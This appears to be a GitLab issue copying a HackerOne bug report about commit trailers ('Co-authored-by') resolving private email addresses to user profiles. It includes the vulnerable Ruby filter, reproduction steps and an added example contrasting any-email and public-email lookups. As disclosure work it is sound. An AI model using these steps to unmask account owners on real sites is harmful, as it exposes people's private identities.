
Authenticated users can find other users by their private email

HackerOne report #1794713 by shells3c on 2022-12-06, assigned to @rshambhuni:


Report

Summary

Since GitLab 14.7.1, 14.6.4, and 14.5.4, you can no longer find users by their non-public email; this is the fix for CVE-2022-0371. This is also documented in the official documentation. However, I found that I could still do it just by using a commit trailer. This happens because lib/banzai/filter/commit_trailers_filter.rb uses User.find_by_any_email to find a user handle from an email address, and User.find_by_any_email doesn't respect the email policy at all:

    def trailer_filter(text)
      text.lines.map! do |line|
        trailer, rest = line.split(':', 2)

        next line unless trailer.downcase.end_with?('-by') && rest.present?

        chunks = rest.split
        author_email = chunks.pop.delete_prefix('<').delete_suffix('>')
        next line unless Devise.email_regexp.match(author_email)

        author_name = chunks.join(' ').strip
        trailer = "#{trailer.strip}:"

        "#{trailer} #{link_to_user_or_email(author_name, author_email, trailer)}\n"
      end.join
    end

    def link_to_user_or_email(name, email, trailer)
      # find_by_any_email matches any confirmed email, public or not
      link_to_user User.find_by_any_email(email),
        name: name,
        email: email,
        trailer: trailer
    end

Something like below:

    commit cd330155a136985ada2c350c854a835afed1fb11 (HEAD -> h1test, origin/h1test)
    Author: me <me@myemail.com>
    Date:   Tue Dec 6 14:36:00 2022 +0700

        Commit message

        Co-authored-by: foo <privateemail@gmail.com>

will be converted to:

    <a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">
      <img alt="FULL_NAME's avatar" src="..." class="avatar s16 avatar-inline" title="FULL_NAME">
    </a>
    <a href="https://gitlab.com/USERNAME" title="privateemail@gmail.com">foo</a>
    &lt;<a href="mailto:privateemail@gmail.com" title="privateemail@gmail.com">privateemail@gmail.com</a>&gt;

Steps to reproduce

I will use my own email address in this test: hacker0x02@gmail.com

  1. Confirm that the email isn't public and can't be searched via the API by visiting https://gitlab.com/api/v4/users?search=hacker0x02@gmail.com

     Response:

         []

  2. Create a repository, clone it and do the following:

         $ echo test > a.txt
         $ git add -A
         $ git commit -m '.
         >
         > Co-authored-by: a <hacker0x02@gmail.com>'
         $ git checkout -b h1test
         $ git push origin h1test
         ...

  3. Visit the repository, view Commits and you will find the commit
  4. Expand the commit and click on the avatar, you will be redirected to my GitLab account

Output of checks

This bug happens on GitLab.com

Impact

Similar to CVE-2022-0371, users can look up accounts with private email addresses
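
The following Ruby snippet is an added example, not GitLab's code and not part of the report: it models the trailer parsing quoted in the report against a constructed in-memory user directory and contrasts a lookup that matches any confirmed email (the find_by_any_email behaviour described above) with one restricted to the address a user chose to make public, which is the check a filter of this kind needs so that a private address is never turned into a profile link. The User struct, USERS, EMAIL_RE and the two lookup helpers are assumptions standing in for GitLab's models and Devise.email_regexp.

```ruby
# Added example (not GitLab's code): minimal model of the commit trailer
# lookup, showing why resolving trailer emails via "any email" leaks private
# addresses and how a lookup restricted to public emails avoids it.
require 'set'

# Constructed sample directory (assumption, not GitLab's User model). Each user
# has a public_email (may be nil) and a set of all confirmed emails.
User = Struct.new(:username, :public_email, :all_emails, keyword_init: true)

USERS = [
  User.new(username: 'alice', public_email: 'alice@example.org',
           all_emails: Set['alice@example.org', 'alice.private@example.net']),
  User.new(username: 'bob', public_email: nil,
           all_emails: Set['bob.private@example.net'])
].freeze

# Simplified stand-in for Devise.email_regexp (assumption).
EMAIL_RE = /\A[^@\s]+@[^@\s]+\z/

# Vulnerable pattern: matches any confirmed email, including private ones.
def find_by_any_email(email)
  USERS.find { |u| u.all_emails.include?(email) }
end

# Hardened pattern: only matches the address the user chose to make public.
def find_by_public_email(email)
  USERS.find { |u| u.public_email == email }
end

# Parse a "<Something>-by: Name <email>" trailer line the same way the quoted
# filter does; returns [trailer, name, email] or nil when the line is not a trailer.
def parse_trailer(line)
  trailer, rest = line.split(':', 2)
  return nil unless trailer && trailer.downcase.end_with?('-by') && rest && !rest.strip.empty?

  chunks = rest.split
  email = chunks.pop.delete_prefix('<').delete_suffix('>')
  return nil unless EMAIL_RE.match?(email)

  [trailer.strip, chunks.join(' ').strip, email]
end

# Resolve a trailer line to the username it would be linked to under the given
# lookup (:find_by_any_email or :find_by_public_email). Returns nil when the
# email does not resolve, i.e. only a plain mailto link would be rendered.
def linked_username(line, lookup)
  parsed = parse_trailer(line)
  return nil unless parsed

  _trailer, _name, email = parsed
  user = send(lookup, email)
  user && user.username
end

if __FILE__ == $PROGRAM_NAME
  line = 'Co-authored-by: foo <alice.private@example.net>'
  puts "any email:    #{linked_username(line, :find_by_any_email).inspect}"    # "alice" (private address leaked)
  puts "public email: #{linked_username(line, :find_by_public_email).inspect}" # nil
end
```

Run as a script, the any-email lookup resolves the private address to "alice" (the account disclosure the report describes), while the public-email lookup returns nil for the same line and still resolves alice@example.org, so trailers written with a user's chosen public address keep working.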

How To Reproduce

Please add reproducibility information to this section: